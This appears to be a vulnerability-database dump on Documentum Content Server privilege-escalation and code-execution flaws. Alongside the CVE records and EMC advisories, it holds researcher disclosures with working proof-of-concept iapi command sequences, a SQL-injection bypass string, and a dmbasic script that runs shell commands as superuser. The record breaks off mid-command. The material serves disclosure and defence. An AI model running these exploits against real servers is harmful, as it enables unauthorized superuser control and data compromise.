"integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4532", "CVE-2017-7220"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:opentext:documentum_content_server:-"], "id": "CVE-2017-7220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7220", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:opentext:documentum_content_server:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-08T16:13:14", "description": "OpenText Documentum Content Server has an inadequate protection mechanism against SQL injection, which 
allows remote authenticated users to execute arbitrary code with super-user privileges by leveraging the availability of the dm_bp_transition docbase method with a user-created dm_procedure object, as demonstrated by use of a backspace character in an injected string. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2513.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-25T14:59:00", "type": "cve", "title": "CVE-2017-7221", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2513", "CVE-2017-7221"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/a:opentext:documentum_content_server:-"], "id": "CVE-2017-7221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7221", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:opentext:documentum_content_server:-:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n\r\n\r\nESA-2014-064.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nESA-2014-064: EMC Documentum Content Server Privilege Escalation 
Vulnerabilities\r\n\r\nEMC Identifier: ESA-2014-064\r\n\r\nCVE Identifier: CVE-2014-2513, CVE-2014-2514\r\n\r\nSeverity Rating: CVSS v2 Base Score: Refer below for scores for each CVE. \r\n\r\nAffected products: \r\n\u2022\tAll EMC Documentum Content Server versions of 7.1\r\n\u2022\tAll EMC Documentum Content Server versions of 7.0\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP2\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP1\r\n\u2022\tAll EMC Documentum Content Server versions prior to 6.7 SP1\r\n\r\nSummary: \r\nEMC Documentum Content Server contains fixes for privilege escalation vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. \r\n\r\nDetails: \r\nEMC Documentum Content Server may be susceptible to the following privilege escalation vulnerabilities:\r\n\r\n\u2022\tCVE-2014-2513\r\nAuthenticated non-privileged users are allowed to execute arbitrary code with super user privileges via custom scripts. This is due to improper authorization checks being performed on the objects created. This could be potentially exploited to perform unauthorized actions on Content Server.\r\no\tCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\n\u2022\tCVE-2014-2514\r\nAuthenticated non-privileged users are allowed to run save RPC commands with super user privileges on arbitrary objects. This is due to improper user authorization checks and object type checks being performed on these objects. This could be potentially exploited by a malicious authenticated non-privileged user to perform unauthorized actions on Content Server including executing arbitrary code.\r\no\tCVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)\r\n\r\nResolution: \r\nEMC recommends all customers upgrade to one of the versions listed below at the earliest opportunity. 
\r\n\u2022\tEMC Documentum Content Server version 7.1 P06 and later\r\n\u2022\tEMC Documentum Content Server version 7.0 P15 and later\r\n\u2022\tEMC Documentum Content Server version 6.7 SP2 P15 and later\r\n\u2022\tEMC Documentum Content Server version 6.7 SP1 P28 and later\r\n\r\nLink to remedies:\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\r\n\r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\nProduct Security Response Center\r\nsecurity_alert@emc.com\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlO64voACgkQtjd2rKp+ALyPuACgxtfoIFxBqHeyFVi0eNwQA428\r\nNaEAoKzmD8WcINVBGj/CYul8UON+Osyr\r\n=wzFw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-07-28T00:00:00", "type": "securityvulns", "title": "ESA-2014-064: EMC Documentum Content Server Privilege Escalation Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-2514", "CVE-2014-2513"], "modified": "2014-07-28T00:00:00", "id": "SECURITYVULNS:DOC:30958", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30958", "sourceData": "", "cvss": {"score": 8.2, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nIn 2011 Yuri Simone discovered a security flaw in EMC Documentum Content Server, which allows users with sysadmin privileges to elevate their privileges to superuser (see CVE-2011-4144). In April 2014 I discovered another set of vulnerabilities related to CVE-2011-4144 (see attached VRF#HUDHKNW4.txt). In September 2014 the vendor announced a fix (see CVE-2014-4622) for only the first vulnerability from VRF#HUDHKNW4.txt (check row 5 in CERT's spreadsheet for VU#315340 (http://www.kb.cert.org/vuls/id/315340)). Yesterday the vendor announced a new fix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that CVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not introduce any security fixes. 
I believe that there are about a dozen of options to elevate privileges from sysadmin to superuser, but I'm going to describe the most obvious one.\r\n\r\n1. If attacker is able to create (or modify) docbase method (object with dm_method type) he is able to elevate his privileges through executing this method, example:\r\n\r\ncat > test.ebs\r\nConst CONNECTION_ERROR As Integer = 33\r\n\r\nSub rmain(d As String, u As String, g As String)\r\n s$ = dmAPIGet("connect," & d & "," & u & ",")\r\n\r\n If s = "" Then\r\n dmExit(CONNECTION_ERROR)\r\n End If\r\n\r\n q$ = "update dm_user objects" & _\r\n " set user_privileges=16" & _\r\n " where user_name='" & g & "'"\r\n\r\n s=dmAPIExec("execquery," & s & ",T," & q)\r\n\r\nEnd Sub\r\n\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f92d\r\nAPI> set,c,l,object_name\r\nSET> test\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> set,c,l,run_as_server\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,use_method_content\r\nSET> T\r\n...\r\nOK\r\nAPI> set,c,l,method_type\r\nSET> dmbasic\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> apply,c,,DO_METHOD,METHOD,S,test,\r\n ARGUMENTS,S,'repo dmadmin test'\r\n...\r\nq0\r\nAPI> retrieve,c,dm_user where user_name='test'\r\n...\r\n11024be980000e8a\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n2. for the reason mentioned above regular users are unable to create or modify docbase methods:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f954\r\nAPI> save,c,l\r\n...\r\n[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (test)\r\n needs to have superuser or sysadmin privilege to save or destroy dm_method object."\r\n\r\n3. But sysadmins were able to create docbase methods. 
Now if sysadmin tries to create docbase method it gets following error:\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f968\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\n[DM_SYSOBJECT_E_LINK_PERMIT2]error: "Linking or unlinking to the folder\r\n '/System/Methods' failed on sysobject '10024be98001f968'.\r\n WRITE permit is required on the folder, when using folder security."\r\n\r\n4. So, it is obvious that remediation provided by vendor relies on ACL restrictions for /System/Methods folder, the problem is vendor does not take into account that Content Server has a set of groups which allow to bypass ACL restrictions and are still manageable by sysadmin users, example:\r\n\r\nAPI> ?,c,alter group dm_escalated_write add testadmin\r\n\r\nAPI> create,c,dm_method\r\n...\r\n10024be98001f969\r\nAPI> set,c,l,object_name\r\nSET> test1\r\n...\r\nOK\r\nAPI> setfile,c,l,test.ebs,crtext\r\n...\r\nOK\r\nAPI> set,c,l,method_verb\r\nSET> ./dmbasic -ermain\r\n...\r\nOK\r\nAPI> save,c,l\r\n...\r\nOK\r\n\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. 
Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "sysadmin privilege in EMC Documentum Content Server", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4531", "CVE-2011-4144", "CVE-2014-4622"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32406", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32406", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see http://seclists.org/bugtraq/2015/Jul/51\r\n\r\nNew behavior introduced in CVE-2015-4532:\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin "" 0000000000000000 0000000000000000\r\n 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe"\r\n 0000000000000000 0000000000000000 0000000000000000 ""\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n[DM_METHOD_E_METHOD_ARGS_INVALID]error:\r\n "The arguments being passed to the method 'dm_bp_transition' are invalid:\r\n arguments contain sql keywords which are not allowed."\r\n\r\n\r\nNew attack vector (note ALL keyword):\r\n\r\nAPI> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='\r\n repo repo dmadmin "" 0000000000000000 0000000000000000\r\n 0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id\r\n from dm_sysobject where r_object_id=''0801fd08805c9dfe"\r\n 0000000000000000 0000000000000000 0000000000000000 ""\r\n 0 0 T F T T dmadmin 0000000000000000'\r\n\r\n__\r\nRegards,\r\nAndrey B. 
Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32405", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32405", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:01", "description": "\r\nProduct: EMC Documentum Content Server\r\nVendor: EMC\r\nVersion: ANY\r\nCVE: N/A\r\nRisk: High\r\nStatus: public/not fixed\r\n\r\nFor detailed description see attached VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt, for vendor announcement see CVE-2015-4532 in http://seclists.org/bugtraq/2015/Aug/86. The problem is PoC code provided in VRF#HUFG9EBA.txt and VRF#HX5OLZ0F.txt misses two obvious points:\r\n\r\n1. Content Server supports about 400 undocumented RPC commands, but PoC code covers only 33 of them, for example, all versions of EMC Documentum Content Server support SAVE_CONT_ATTRS_V6 RPC command, this RPC command has the same behaviour as SAVE_CONT_ATTRS from VRF#HUFG9EBA.txt and hence it is vulnerable:\r\n\r\nAPI> retrieve,c,dm_user where user_name=USER\r\n...\r\n11024be980000900\r\nAPI> get,c,l,user_privileges\r\n...\r\n0\r\nAPI> get,c,l,i_vstamp\r\n...\r\n1\r\nAPI> apply,c,11024be980000900,SAVE_CONT_ATTRS_V6,\r\n OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B,F,\r\n i_vstamp,I,1,user_privileges,I,16\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nRESULT\r\n------------\r\n 1\r\nAPI> revert,c,l,\r\n...\r\nOK\r\nAPI> get,c,l,user_privileges\r\n...\r\n16\r\n\r\n\r\n2. 
Creating malicious user with superuser privileges or malicious docbase method is not the only option to escalate privileges, demonstration:\r\n\r\n-- \r\n-- acquiring r_object_id for brand new\r\n-- dm_registered object\r\n-- \r\nAPI> apply,c,,NEXT_ID_LIST,TAG,I,25,HOW_MANY,I,1\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nnext_id\r\n----------------\r\n19024be98001fd0b\r\n(1 row affected)\r\n\r\n-- \r\n-- Creating brand new dm_registered object\r\n-- \r\nAPI> apply,c,19024be98001fd0b,SysObjSave,\r\n OBJECT_TYPE,S,dm_registered,\r\n IS_NEW_OBJECT,B,T,\r\n i_vstamp,I,0,\r\n table_name,S,dm_user_s,\r\n table_owner,S,repo,\r\n owner_name,S,repo,\r\n world_permit,I,7,\r\n object_name,S,dm_user_s,\r\n owner_table_permit,I,15,\r\n group_table_permit,I,15,\r\n world_table_permit,I,15,\r\n r_object_type,S,dm_registered\r\n...\r\nq0\r\nAPI> ?,c,q0\r\nresult\r\n------------\r\n 1\r\n(1 row affected)\r\n\r\n-- \r\n-- Now attacker is able to modify database tables\r\n-- \r\nAPI> ?,c,select count(*) from dm_dbo.dm_user_s\r\ncount(*)\r\n----------------------\r\n 7930\r\n(1 row affected)\r\n\r\nAPI> ?,c,update dm_dbo.dm_user_s set user_privileges=16\r\n where user_name=USER\r\nrows_updated\r\n------------\r\n 1\r\n(1 row affected)\r\n\r\nAPI> ?,c,select user_privileges from dm_dbo.dm_user_s\r\n where user_name=USER\r\nuser_privileges\r\n---------------\r\n 16\r\n(1 row affected)\r\n\r\n\r\n__\r\nRegards,\r\nAndrey B. 
Panfilov\r\n", "cvss3": {}, "published": "2015-08-24T00:00:00", "type": "securityvulns", "title": "Privilege escalation through RPC commands in EMC Documentum Content Server (incomplete fix in CVE-2015-4532)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2015-4532"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32402", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32402", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:53:24", "description": "Code injection, privilege escalation.", "cvss3": {}, "published": "2015-09-14T00:00:00", "type": "securityvulns", "title": "EMC Documentum multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-4637", "CVE-2015-4535", "CVE-2014-2512", "CVE-2014-2514", "CVE-2014-2507", "CVE-2015-0517", "CVE-2014-2511", "CVE-2015-4533", "CVE-2015-4531", "CVE-2014-2510", "CVE-2014-4618", "CVE-2014-4626", "CVE-2014-2506", "CVE-2014-2520", "CVE-2015-4537", "CVE-2015-4534", "CVE-2014-2521", "CVE-2015-0548", "CVE-2015-4530", "CVE-2014-4638", "CVE-2015-4536", "CVE-2014-2518", "CVE-2015-4528", "CVE-2014-4629", "CVE-2015-0550", "CVE-2015-0547", "CVE-2014-2513", "CVE-2014-2508", "CVE-2014-4639", "CVE-2014-2515", "CVE-2014-2503", "CVE-2015-4532", "CVE-2015-4529", "CVE-2015-4544", "CVE-2015-4524", "CVE-2015-0549", "CVE-2015-0518", "CVE-2014-4635", "CVE-2015-0551", "CVE-2014-4636"], "modified": "2015-09-14T00:00:00", "id": "SECURITYVULNS:VULN:13831", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13831", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n\r\n\r\nESA-2014-091.txt\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2014-091: EMC Documentum Content Server 
Multiple Privilege Escalation Vulnerabilities \r\n\r\nEMC Identifier: ESA-2014-091\r\n\r\nCVE Identifier: CVE-2014-4621, CVE-2014-4622\r\n\r\nSeverity Rating: CVSS v2 Base Score: See below for individual scores for each CVE\r\n\r\nAffected products: \r\n\r\n\u2022\tAll EMC Documentum Content Server versions of 7.1\r\n\u2022\tAll EMC Documentum Content Server versions of 7.0\r\n\u2022\tAll EMC Documentum Content Server versions of 6.7 SP2\r\n\u2022\tAll EMC Documentum Content Server versions prior to 6.7 SP2\r\n\r\nSummary: \r\n\r\nEMC Documentum Content Server contains fixes for multiple privilege escalation vulnerabilities that can be potentially leveraged by a malicious attacker to compromise the affected system.\r\n\r\nDetails: \r\n\r\nEMC Documentum Content Server may be susceptible to the following privilege escalation vulnerabilities: \r\n\u2022\tCVE-2014-4621:\r\nNon-privileged Content Server users are allowed to create system objects with super-user privileges due to improper authorization checks being performed on subtypes of protected Documentum system types. This could be potentially exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server.\r\nCVSS v2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)\r\n\r\n\u2022\tCVE-2014-4622:\r\nContent Server users with sysadmin privileges may potentially escalate their privileges to become a super-user due to improper authorization checks being performed on subgroups that exists within the dm_superusers group and other privileged groups. 
This could be potentially exploited by a malicious attacker to gain unauthorized access to data or to perform unauthorized actions on Content Server.\r\nCVSS v2 Base Score: 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C)\r\n\r\nResolution: \r\n\r\nThe following versions contain the security fixes to address these vulnerabilities: \r\n\u2022\tEMC Documentum Content Server version 7.1 P08 and later\r\n\u2022\tEMC Documentum Content Server version 7.0 P15: Hotfix is available for Windows & Linux. For Solaris and AIX contact EMC Support.\r\n\u2022\tEMC Documentum Content Server version 6.7 SP2 P17 and later\r\n\r\nEMC strongly recommends all customers to upgrade to one of the above versions at the earliest opportunity.\r\n\r\nLink to remedies:\r\n\r\nRegistered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server\r\n\r\nContact EMC Support to obtain hotfix for 7.0 P15 Windows & Linux \r\n\r\n\r\nRead and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.\r\n\r\nFor an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.\r\n\r\nEMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. 
EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.\r\n\r\nEMC Product Security Response Center\r\nsecurity_alert@emc.com\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (Cygwin)\r\n\r\niEYEARECAAYFAlQXOb4ACgkQtjd2rKp+ALxGuwCfdFo23yn+/7W/QIYljZf1/E9O\r\nKPYAnRC4UuwJWernPdAvIcjzWrvhG3ly\r\n=Z24R\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-09-21T00:00:00", "type": "securityvulns", "title": "ESA-2014-091: EMC Documentum Content Server Multiple Privilege Escalation Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-4621", "CVE-2014-4622"], "modified": "2014-09-21T00:00:00", "id": "SECURITYVULNS:DOC:31099", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31099", "sourceData": "", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "cvss3": {}, "published": "2017-04-25T00:00:00", "type": "exploitpack", "title": "OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4533", "CVE-2017-7221", "CVE-2014-2513"], "modified": "2017-04-25T00:00:00", "id": "EXPLOITPACK:4023A919E9FB0AB63EBFE6682BDBFA0D", "href": "", "sourceData": "'''\nCVE Identifier: CVE-2017-7221\nVendor: OpenText\nAffected products: OpenText Documentum Content Server (all versions)\nResearcher: Andrey B. Panfilov\nSeverity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\nFix: not available\nPoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44\n\nDescription: \n\nall versions of Documentum Content Server contain dm_bp_transition docbase \nmethod (\"stored procedure\u201d) which is written on basic, implementation of this docbase \nmethods does not properly validate user input which allows attacker to execute arbitrary \ncode with superuser privileges.\n\nRelated code snippet is:\n\n==========================================8<========================================\n\n'Evaluate the user-defined entry criteria\nIf (result = True And run_entry = \"T\") Then\nIf (debug = True) Then\nPrintToLog sess, \"Run user defined entry criteria.\"\nEnd If\n'\n' researcher comment:\n' userEntryID parameter is controlled by attacker\n'\nresult = RunProcedure(userEntryID, 1, sess, sysID,_\nuser_name, targetState)\nEnd If\n\n...\n\n'\n' researcher comment:\n' procID parameter is controlled by attacker\n'\n\nFunction RunProcedure(procID As String, procNo As Integer,_\nsessID As String, objID As String, userName As String,_\ntargetState As String) As Boolean\n\n...\n\nStartIt:\nIf (procID <> \"0000000000000000\") Then\nresult = CheckStatus(\"\", 1, \"loading procedure \" & procID, True, errorMsg)\n'\n' 
researcher comment:\n' here basic interpreter loads content of user-provided script\n' from underlying repostiory using following technique:\n' \n' checking that it is dealing with dm_procedure object\n' (check was introduced in CVE-2014-2513):\n' id,c,dm_procedure where r_object_id='procID'\n' \n' getting content of basic script\n' fetch,c,procID\n' getpath,c,l\n'\n\nresult = external(procID)\nIf (result = True) Then\nIf (procNo = 1) Then\n' --- Running user-defined entry criteria ---\nresult = CheckStatus(\"\", 1, \"Running EntryCriteria\", True, errorMsg)\nOn Error Goto NoFunction\n'\n' researcher comment\n' here dmbasic interpreter executes user defined function\n'\nresult = EntryCriteria(sessID, objID, userName,_\ntargetState, errorStack)\nIf (result = False) Then\nerrorStack = \"[ErrorCode] 1500 [ServerError] \" + _\nerrorStack\nEnd If\n\n==========================================>8========================================\n\nSo, attacker is able to create it\u2019s own basic procedure in repository and pass it\u2019s identifier\nas argument for dm_bp_transition procedure:\n\n\n==========================================8<========================================\n$ cat /tmp/test\ncat: /tmp/test: No such file or directory\n$ cat > test.ebs\nPublic Function EntryCriteria(ByVal SessionId As String,_\nByVal ObjectId As String,_\nByVal UserName As String,_\nByVal TargetState As String,_\nByRef ErrorString As String) As Boolean\nt = ShellSync(\"echo dm_bp_transition_has_vulnerability > /tmp/test\")\nEntryCriteria=True\nEnd Function\n$ iapi\nPlease enter a docbase name (docubase): repo\nPlease enter a user (dmadmin): unprivileged_user\nPlease enter password for unprivileged_user:\n\n\nEMC Documentum iapi - Interactive API interface\n(c) Copyright EMC Corp., 1992 - 2011\nAll rights reserved.\nClient Library Release 6.7.1000.0027\n\n\nConnecting to Server using docbase repo\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800b1a37\nstarted for user 
unprivileged_user.\"\n\n\nConnected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_procedure\n...\n0801d920804e5416\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\nAPI> ?,c,execute do_method with method='dm_bp_transition',\narguments='repo repo dmadmin \"\" 0000000000000000 0000000000000000\n0000000000000000 0801d920804e5416 0000000000000000 0000000000000000\n0000000000000000 \"\" 0 0 T F T T dmadmin 0000000000000000'\n(1 row affected)\n\nAPI> Bye\n$ cat /tmp/test\ndm_bp_transition_has_vulnerability\n\n==========================================>8========================================\n\n\nVendor was been notified about this vulnerability on November 2013 using customer \nsupport channel, after a while vendor started claiming that this vulnerability \nwas remediated, though no CVE was announced. Moreover, the fix was contested\nand CERT/CC started tracking this vulnerability, the PoC provided\nto CERT/CC was:\n\n==========================================8<========================================\nVendor have decided that the root cause of problem is users are able to\ncreate dm_procedure objects, and now in Documentum Content Server\nv6.7SP1P26 we have following behavior:\n\n[DM_SESSION_I_SESSION_START]info: \"Session 0101d920800f0174 started for\nuser unprivileged_user.\"\n\n\nConnected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle\nSession id is s0\nAPI> create,c,dm_procedure\n...\n0801d920805929d0\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\n[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: \"The current user\n(unprivileged_user) needs to have superuser or sysadmin privilege.\"\n\nBUT:\n\nAPI> create,c,dm_document\n...\n0901d920805929dd\nAPI> set,c,l,object_name\nSET> test\n...\nOK\nAPI> setfile,c,l,test.ebs,crtext\n...\nOK\nAPI> save,c,l\n...\nOK\n\nAPI> ?,c,execute 
